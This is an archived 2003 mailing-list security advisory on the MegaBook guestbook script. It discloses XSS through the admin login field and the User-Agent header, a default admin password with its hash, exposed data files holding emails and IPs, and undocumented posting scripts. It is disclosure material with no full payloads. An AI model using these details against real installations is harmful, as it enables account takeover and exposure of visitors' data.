lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <Law11-OE13Kg4dBd8lf00015cb8@hotmail.com>
From: se_cur_ity at hotmail.com (morning_wood)
Subject: Megabook 2.0 -XSS & UA execution

------------------------------------------------------------------
          - EXPL-A-2003-011 exploitlabs.com Advisory 011
------------------------------------------------------------------
                        -= MegaBook =-



exploitlabs.com
June 29, 2003



Vunerability(s):
----------------
1. XSS and Unchecked Input Length
2. default admin password
3. XSS via UA
4. Non secure on NT
5. Undocumented attack vectors
Product:
--------
megabook guestbook
http://www.militerry.com/megabook/

Description of product:
-----------------------
"Megabook is an online guestbook that allows users that come to your
site to leave a message. These messages can also contain their e-mail
addresses, websites.""everyone will be able to view the messages left
by past users"  ...and whatever XSS they care to leave

from thier FAQ..

"Q: Will Megabook work on Windows NT servers?
A: Megabook was only tested on UNIX-based servers.
There is a possibility that it could work but from
other people testing it seems that it won't."

dunno who they use to test but it works fine on NT ( heck i'll beta )

Note: this is a very popular scrript, found easly by google: gbook.db
all tests were run in a default state per the instalation instructions
and
confirmed in the wild.


VUNERABILITY / EXPLOIT
======================

where to start...


1. XSS is executeable via the login field in admin.cgi and carries no
length limit
http://[test-ur]/megabook/admin.cgi

2. Default password is "megabook"
http://www.militerry.com/megabook/files/20/setup.db ( note:
meJyatGfwfBXQ  = megabook )
the first two characters are always the correct character and sequence

3. User Agent XSS vulnerability in gbook.db
contaminating the UA with XSS causes the script become readable /
executable on guestbook viewing

there are many more issues in this very popular script... I lost
track.

4. Despite the vendor saying the script does not work on NT, it does
with perl installed,
but this configuration is not desired as all files become www
readable.
( gbook.db contains email and ip addresses )
( setup.db contains the not great hashed password and admin info )

5. preview.txt , missing.txt and signgbook.cgi (sic)  provide posting
function ( not documented )
--------- snip of the cgi -------------
chmod(0666, "setup.db");
open (SETUP, "setup.db");
@setup = <SETUP>;
close(SETUP);
chmod(0000, "setup.db");
-------- end snip--------------------


Local:
------
not realy

Remote:
-------
real bad



Vendor Fix:
-----------
No fix on 0day

Vendor Contact:
---------------
megabook@...iterry.com
Concurrent with this advisory


Credits:
--------
Donnie Werner
http://exploitlabs.com
http://frame4.com

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ